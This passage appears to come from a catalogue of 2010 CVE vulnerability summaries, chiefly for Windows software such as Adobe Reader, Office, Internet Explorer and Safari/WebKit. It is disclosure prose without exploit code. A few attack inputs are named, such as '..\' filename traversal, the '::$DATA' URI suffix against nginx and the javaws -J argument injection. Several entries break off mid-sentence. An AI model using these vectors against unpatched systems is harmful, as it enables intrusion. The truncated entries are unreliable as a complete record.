.pwz, .sldm, or .sldx file. [CVE-2010-3131] Untrusted search path vulnerability in Mozilla Firefox before 3.5.12 and 3.6.x before 3.6.9, Thunderbird before 3.0.7 and 3.1.x before 3.1.3, and SeaMonkey before 2.0.7 on Windows XP allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll that is located in the same folder as a .htm, .html, .jtx, .mfp, or .eml file. [CVE-2010-3111] Google Chrome before 6.0.472.53 does not properly mitigate an unspecified flaw in the Windows kernel, which has unknown impact and attack vectors, a different vulnerability than CVE-2010-2897. [CVE-2010-3101] Directory traversal vulnerability in FTPx Corp FTP Explorer 10.5.19.1 for Windows, and probably earlier versions, allows remote FTP servers to write arbitrary files via a "..\" (dot dot backslash) in a filename. [CVE-2010-3069] Stack-based buffer overflow in the (1) sid_parse and (2) dom_sid_parse functions in Samba before 3.5.5 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted Windows Security ID (SID) on a file share. [CVE-2010-3008] Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 on Windows allows local users to gain privileges or cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3007. [CVE-2010-3005] Unspecified vulnerability in HP Operations Agent 7.36 and 8.6 on Windows allows local users to gain privileges via unknown vectors. [CVE-2010-3004] Unspecified vulnerability in HP Operations Agent 7.36 and 8.6 on Windows allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2010-3001] Unspecified vulnerability in an ActiveX control in the Internet Explorer (IE) plugin in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows has unknown impact and attack vectors related to "multiple browser windows." [CVE-2010-3000] Multiple integer overflows in the ParseKnownType function in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows allow remote attackers to execute arbitrary code via crafted (1) HX_FLV_META_AMF_TYPE_MIXEDARRAY or (2) HX_FLV_META_AMF_TYPE_ARRAY data in an FLV file. [CVE-2010-2996] Array index error in RealNetworks RealPlayer 11.0 through 11.1 on Windows allows remote attackers to execute arbitrary code via a malformed header in a RealMedia .IVR file. [CVE-2010-2991] The IICAClient interface in the ICAClient library in the ICA Client ActiveX Object (aka ICO) component in Citrix Online Plug-in for Windows for XenApp & XenDesktop before 12.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted HTML document that triggers the reading of a .ICA file. [CVE-2010-2990] Citrix Online Plug-in for Windows for XenApp & XenDesktop before 11.2, Citrix Online Plug-in for Mac for XenApp & XenDesktop before 11.0, Citrix ICA Client for Linux before 11.100, Citrix ICA Client for Solaris before 8.63, and Citrix Receiver for Windows Mobile before 11.5 allow remote attackers to execute arbitrary code via (1) a crafted HTML document, (2) a crafted .ICA file, or (3) a crafted type field in an ICA graphics packet, related to a "heap offset overflow" issue. [CVE-2010-2897] Google Chrome before 5.0.375.125 does not properly mitigate an unspecified flaw in the Windows kernel, which has unknown impact and attack vectors. [CVE-2010-2890] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-2889] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted font, a different vulnerability than CVE-2010-3626. [CVE-2010-2888] Multiple unspecified vulnerabilities in an ActiveX control in Adobe Reader and Acrobat 8.x before 8.2.5 and 9.x before 9.4 on Windows allow attackers to execute arbitrary code via unknown vectors. [CVE-2010-2884] Adobe Flash Player 10.1.82.76 and earlier on Windows, Mac OS X, Linux, and Solaris and 10.1.92.10 on Android [CVE-2010-2883] Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010. NOTE: some of these details are obtained from third party information. [CVE-2010-2750] Array index error in Microsoft Word 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Word document that triggers memory corruption, aka "Word Index Vulnerability." [CVE-2010-2748] Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly check an unspecified boundary during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Boundary Check Vulnerability." [CVE-2010-2747] Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly handle an uninitialized pointer during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Uninitialized Pointer Vulnerability." [CVE-2010-2734] Cross-site scripting (XSS) vulnerability in the mobile portal in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "XSS Issue on UAG Mobile Portal Website in Forefront Unified Access Gateway Vulnerability." [CVE-2010-2733] Cross-site scripting (XSS) vulnerability in the Web Monitor in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "UAG XSS Allows EOP Vulnerability." [CVE-2010-2732] Open redirect vulnerability in the web interface in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, aka "UAG Redirection Spoofing Vulnerability." [CVE-2010-2730] Buffer overflow in Microsoft Internet Information Services (IIS) 7.5, when FastCGI is enabled, allows remote attackers to execute arbitrary code via crafted headers in a request, aka "Request Header Buffer Overflow Vulnerability." [CVE-2010-2728] Heap-based buffer overflow in Microsoft Outlook 2002 SP3, 2003 SP3, and 2007 SP2, when Online Mode for an Exchange Server is enabled, allows remote attackers to execute arbitrary code via a crafted e-mail message, aka "Heap Based Buffer Overflow in Outlook Vulnerability." [CVE-2010-2703] Stack-based buffer overflow in the execvp_nc function in the ov.dll module in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53, when running on Windows, allows remote attackers to execute arbitrary code via a long HTTP request to webappmon.exe. [CVE-2010-2666] Opera before 10.54 on Windows and Mac OS X does not properly enforce permission requirements for widget filesystem access and directory selection, which allows user-assisted remote attackers to create or modify arbitrary files, and consequently execute arbitrary code, via widget File I/O operations. [CVE-2010-2665] Cross-site scripting (XSS) vulnerability in Opera before 10.54 on Windows and Mac OS X, and before 10.11 on UNIX platforms, allows remote attackers to inject arbitrary web script or HTML via a data: URI, related to incorrect detection of the "opening site." [CVE-2010-2661] Opera before 10.54 on Windows and Mac OS X, and before 10.60 on UNIX platforms, does not properly restrict access to the full pathname of a file selected for upload, which allows remote attackers to obtain potentially sensitive information via unspecified DOM manipulations. [CVE-2010-2660] Opera before 10.54 on Windows and Mac OS X, and before 10.60 on UNIX platforms, does not properly restrict certain uses of homograph characters in domain names, which makes it easier for remote attackers to spoof IDN domains via unspecified choices of characters. [CVE-2010-2659] Opera before 10.50 on Windows, before 10.52 on Mac OS X, and before 10.60 on UNIX platforms makes widget properties accessible to third-party domains, which allows remote attackers to obtain potentially sensitive information via a crafted web site. [CVE-2010-2657] Opera before 10.60 on Windows and Mac OS X does not properly prevent certain double-click operations from running a program located on a web site, which allows user-assisted remote attackers to execute arbitrary code via a crafted web page that bypasses a dialog. [CVE-2010-2594] Multiple cross-site request forgery (CSRF) vulnerabilities in the web management interface in InterSect Alliance Snare Agent 3.2.3 and earlier on Solaris, Snare Agent 3.1.7 and earlier on Windows, Snare Agent 1.5.0 and earlier on Linux and AIX, Snare Agent 1.4 and earlier on IRIX, Snare Epilog 1.5.3 and earlier on Windows, and Snare Epilog 1.2 and earlier on UNIX allow remote attackers to hijack the authentication of administrators for requests that (1) change the password or (2) change the listening port. [CVE-2010-2573] Integer underflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3, PowerPoint Viewer SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted PowerPoint document, aka "PowerPoint Integer Underflow Causes Heap Corruption Vulnerability." [CVE-2010-2572] Buffer overflow in Microsoft PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted PowerPoint 95 document, aka "PowerPoint Parsing Buffer Overflow Vulnerability." [CVE-2010-2571] Array index error in pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher 97 file, aka "Memory Corruption Due To Invalid Index Into Array in Pubconv.dll Vulnerability." [CVE-2010-2570] Heap-based buffer overflow in pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3, 2003 SP3, 2007 SP2, and 2010 allows remote attackers to execute arbitrary code via a crafted Publisher file that uses an old file format, aka "Heap Overrun in pubconv.dll Vulnerability." [CVE-2010-2569] pubconv.dll (aka the Publisher Converter DLL) in Microsoft Publisher 2002 SP3, 2003 SP3, and 2007 SP2 does not properly handle an unspecified size field in certain older file formats, which allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted Publisher file, aka "Size Value Heap Corruption in pubconv.dll Vulnerability." [CVE-2010-2562] Microsoft Office Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Excel file, aka "Excel Memory Corruption Vulnerability." [CVE-2010-2561] Microsoft XML Core Services (aka MSXML) 3.0 does not properly handle HTTP responses, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted response, aka "Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption Vulnerability." [CVE-2010-2560] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Layout Memory Corruption Vulnerability." [CVE-2010-2559] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability," a different vulnerability than CVE-2009-3671, CVE-2009-3674, CVE-2010-0245, and CVE-2010-0246. [CVE-2010-2558] Race condition in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via vectors related to an object in memory, aka "Race Condition Memory Corruption Vulnerability." [CVE-2010-2557] Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-2556] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-2489] Buffer overflow in Ruby 1.9.x before 1.9.1-p429 on Windows might allow local users to gain privileges via a crafted ARGF.inplace_mode value that is not properly handled when constructing the filenames of the backup files. [CVE-2010-2442] Microsoft Internet Explorer, possibly 8, does not properly restrict focus changes, which allows remote attackers to read keystrokes via "cross-domain IFRAME gadgets." [CVE-2010-2428] Cross-site scripting (XSS) vulnerability in admin_loginok.html in the Administrator web interface in Wing FTP Server for Windows 3.5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted POST request. [CVE-2010-2264] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document. [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI. [CVE-2010-2212] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via a PDF file containing Flash content with a crafted #1023 (3FFh) tag, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, and CVE-2010-2211. [CVE-2010-2211] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, and CVE-2010-2212. [CVE-2010-2210] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-2209] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2207, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-2208] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, dereference a heap object after this object's deletion, which allows attackers to execute arbitrary code via unspecified vectors. [CVE-2010-2207] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-2206] Array index error in AcroForm.api in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted GIF image in a PDF file, which bypasses a size check and triggers a heap-based buffer overflow. [CVE-2010-2205] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, access uninitialized memory, which allows attackers to execute arbitrary code via unspecified vectors. [CVE-2010-2204] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors. [CVE-2010-2202] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-2201] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code via a PDF file with crafted Flash content involving the (1) pushstring (0x2C) operator, (2) debugfile (0xF1) operator, and an "invalid pointer vulnerability" that triggers memory corruption, a different vulnerability than CVE-2010-1285 and CVE-2010-2168. [CVE-2010-2168] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code via a PDF file with crafted Flash content, involving the newfunction (0x44) operator and an "invalid pointer vulnerability" that triggers memory corruption, a different vulnerability than CVE-2010-1285 and CVE-2010-2201. [CVE-2010-2157] Unspecified vulnerability in CA ARCserve Backup r11.5 SP4, r12.0 SP2, and r12.5 SP1 on Windows allows local users to obtain sensitive information via unknown vectors. [CVE-2010-2119] Microsoft Internet Explorer 6.0.2900.2180 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid nntp:// URIs. [CVE-2010-2118] Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs. [CVE-2010-2090] The npb_protocol_error function in sna V5router64 in IBM Communications Server for Windows 6.1.3 and Communications Server for AIX (aka CSAIX or CS/AIX) in sna.rte before 6.3.1.2 allows remote attackers to cause a denial of service (daemon crash) via APPC data containing a GDSID variable with a GDS length that is too small. [CVE-2010-2088] ASP.NET in Microsoft .NET 3.5 does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks against the form control via the __VIEWSTATE parameter. [CVE-2010-2085] The default configuration of ASP.NET in Microsoft .NET before 1.1 has a value of FALSE for the EnableViewStateMac property, which allows remote attackers to conduct cross-site scripting (XSS) attacks via the __VIEWSTATE parameter. [CVE-2010-2084] Microsoft ASP.NET 2.0 does not prevent setting the InnerHtml property on a control that inherits from HtmlContainerControl, which allows remote attackers to conduct cross-site scripting (XSS) attacks via vectors related to an attribute. [CVE-2010-2083] Microsoft Dynamics GP has a default value of ACCESS for the system password, which might make it easier for remote authenticated users to bypass intended access restrictions via unspecified vectors. [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. [CVE-2010-2011] Microsoft Dynamics GP uses a substitution cipher to encrypt the system password field and unspecified other fields, which makes it easier for remote authenticated users to obtain sensitive information by decrypting a field's contents. [CVE-2010-1991] Microsoft Internet Explorer 6.0.2900.2180, 7, and 8.0.7600.16385 executes a mail application in situations where an IFRAME element has a mailto: URL in its SRC attribute, which allows remote attackers to cause a denial of service (excessive application launches) via an HTML document with many IFRAME elements. [CVE-2010-1988] Mozilla Firefox 3.6.3 on Windows XP SP3 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly execute arbitrary code via JavaScript code that performs certain string concatenation and substring operations, a different vulnerability than CVE-2009-1571. [CVE-2010-1987] Mozilla Firefox 3.6.3 on Windows XP SP3 allows remote attackers to cause a denial of service (memory consumption, out-of-bounds read, and application crash) via JavaScript code that appends long strings to the content of a P element, and performs certain other string concatenation and substring operations, related to the DoubleWideCharMappedString class in USP10.dll and the gfxWindowsFontGroup::GetUnderlineOffset function in xul.dll, a different vulnerability than CVE-2009-1571. [CVE-2010-1986] Mozilla Firefox 3.6.3 on Windows XP SP3 allows remote attackers to cause a denial of service (memory consumption and application crash) via JavaScript code that creates multiple arrays containing elements with long string values, and then appends long strings to the content of a P element, related to the gfxWindowsFontGroup::MakeTextRun function in xul.dll, a different vulnerability than CVE-2009-1571. [CVE-2010-1971] Cross-site request forgery (CSRF) vulnerability in HP Insight Software Installer for Windows before 6.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors, a different vulnerability than CVE-2010-1968. [CVE-2010-1970] Unspecified vulnerability in HP Insight Software Installer for Windows before 6.1 allows local users to read or modify data, and consequently gain privileges, via unknown vectors. [CVE-2010-1969] Cross-site scripting (XSS) vulnerability in HP Virtual Connect Enterprise Manager for Windows before 6.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2010-1968] Cross-site request forgery (CSRF) vulnerability in HP Insight Software Installer for Windows before 6.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors, a different vulnerability than CVE-2010-1971. [CVE-2010-1967] Unspecified vulnerability in HP Insight Software Installer for Windows before 6.1 allows local users to read or modify data via unknown vectors. [CVE-2010-1966] Unspecified vulnerability in HP Insight Control power management for Windows before 6.1 allows local users to read or modify data, or cause a denial of service, via unknown vectors. [CVE-2010-1965] Unspecified vulnerability in HP Insight Orchestration for Windows before 6.1 allows remote attackers to read or modify data via unknown vectors. [CVE-2010-1940] Apple Safari 4.0.5 on Windows sends the "Authorization: Basic" header appropriate for one web site to a different web site named in a Location header received from the first site, which allows remote web servers to obtain sensitive information by logging HTTP requests. NOTE: the provenance of this information is unknown [CVE-2010-1939] Use-after-free vulnerability in Apple Safari 4.0.5 on Windows allows remote attackers to execute arbitrary code by using window.open to create a popup window for a crafted HTML document, and then calling the parent window's close method, which triggers improper handling of a deleted window object. [CVE-2010-1903] Microsoft Office Word 2002 SP3 and 2003 SP3, and Office Word Viewer, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a malformed record in a Word file, aka "Word HTML Linked Objects Memory Corruption Vulnerability." [CVE-2010-1902] Buffer overflow in Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2010-1901] Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2010-1900] Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2010-1899] Stack consumption vulnerability in the ASP implementation in Microsoft Internet Information Services (IIS) 5.1, 6.0, 7.0, and 7.5 allows remote attackers to cause a denial of service (daemon outage) via a crafted request, related to asp.dll, aka "IIS Repeated Parameter Request Denial of Service Vulnerability." [CVE-2010-1881] The FieldList ActiveX control in the Microsoft Access Wizard Controls in ACCWIZ.dll in Microsoft Office Access 2003 SP3 does not properly interact with the memory-access approach used by Internet Explorer and Office during instantiation, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via an HTML document that references this control along with crafted persistent storage data, aka "ACCWIZ.dll Uninitialized Variable Vulnerability." [CVE-2010-1852] Microsoft Internet Explorer, when the Invisible Hand extension is enabled, uses cookies during background HTTP requests in a possibly unexpected manner, which might allow remote web servers to identify specific persons and their product searches via HTTP request logging, related to a "cross-site data leakage" issue. [CVE-2010-1824] Use-after-free vulnerability in WebKit, as used in Apple iTunes before 10.2 on Windows, Apple Safari, and Google Chrome before 6.0.472.59, allows remote attackers to execute arbitrary code or cause a denial of service via vectors related to SVG styles, the DOM tree, and error messages. [CVE-2010-1805] Untrusted search path vulnerability in Apple Safari 4.x before 4.1.2 and 5.x before 5.0.2 on Windows allows local users to gain privileges via a Trojan horse explorer.exe (aka Windows Explorer) program in a directory containing a file that had been downloaded by Safari. [CVE-2010-1799] Stack-based buffer overflow in the error-logging functionality in Apple QuickTime before 7.6.7 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file. [CVE-2010-1796] The AutoFill feature in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to obtain sensitive Address Book Card information via JavaScript code that forces keystroke events for input fields. [CVE-2010-1795] Untrusted search path vulnerability in Apple iTunes before 9.1, when running on Windows 7, Vista, and XP, allows local users and possibly remote attackers to gain privileges via a Trojan horse DLL in the current working directory. [CVE-2010-1793] Multiple use-after-free vulnerabilities in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1792] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1791] Integer signedness error in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving a JavaScript array index. [CVE-2010-1790] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1789] Heap-based buffer overflow in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a JavaScript string object. [CVE-2010-1788] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1787] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1786] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1785] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1784] The counters functionality in the Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1783] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1782] WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1780] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4 [CVE-2010-1778] Cross-site scripting (XSS) vulnerability in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via an RSS feed. [CVE-2010-1774] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses out-of-bounds memory during processing of HTML tables, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document. [CVE-2010-1771] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving fonts. [CVE-2010-1770] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Apple Safari before 4.1 on Mac OS X 10.4, and Google Chrome before 5.0.375.70 does not properly handle a transformation of a text node that has the IBM1147 character set, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document containing a BR element, related to a "type checking issue." [CVE-2010-1769] WebKit in Apple iTunes before 9.2 on Windows, and Apple iOS before 4 on the iPhone and iPod touch, accesses out-of-bounds memory during the handling of tables, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, a different vulnerability than CVE-2010-1387 and CVE-2010-1763. [CVE-2010-1764] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, follows multiple redirections during form submission, which allows remote web servers to obtain sensitive information by recording the form data. [CVE-2010-1763] Unspecified vulnerability in WebKit in Apple iTunes before 9.2 on Windows has unknown impact and attack vectors, a different vulnerability than CVE-2010-1387 and CVE-2010-1769. [CVE-2010-1762] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving HTML in a TEXTAREA element. [CVE-2010-1761] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving HTML document subtrees. [CVE-2010-1759] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the Node.normalize method. [CVE-2010-1758] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving DOM Range objects. [CVE-2010-1750] Use-after-free vulnerability in Apple Safari before 5.0 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to improper window management. [CVE-2010-1749] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the Cascading Style Sheets (CSS) run-in property and multiple invocations of a destructor for a child element that has been referenced multiple times. [CVE-2010-1728] Opera before 10.53 on Windows and Mac OS X does not properly handle a series of document modifications that occur asynchronously, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via JavaScript that writes <marquee> sequences in an infinite loop, leading to attempted use of uninitialized memory. NOTE: this might overlap CVE-2006-6955. [CVE-2010-1681] Buffer overflow in VISIODWG.DLL before 10.0.6880.4 in Microsoft Office Visio allows user-assisted remote attackers to execute arbitrary code via a crafted DXF file, a different vulnerability than CVE-2010-0254 and CVE-2010-0256. [CVE-2010-1508] Heap-based buffer overflow in Apple QuickTime before 7.6.9 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Track Header (aka tkhd) atoms. [CVE-2010-1489] The XSS Filter in Microsoft Internet Explorer 8 does not properly perform neutering for the SCRIPT tag, which allows remote attackers to conduct cross-site scripting (XSS) attacks against web sites that have no inherent XSS vulnerabilities, a different issue than CVE-2009-4074. [CVE-2010-1423] Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when running on Windows and possibly on Linux, allows remote attackers to execute arbitrary code via the (1) -J or (2) -XXaltjvm argument to javaws.exe, which is processed by the launch method. NOTE: some of these details are obtained from third party information. [CVE-2010-1422] WebKit in Apple Safari before 5.0 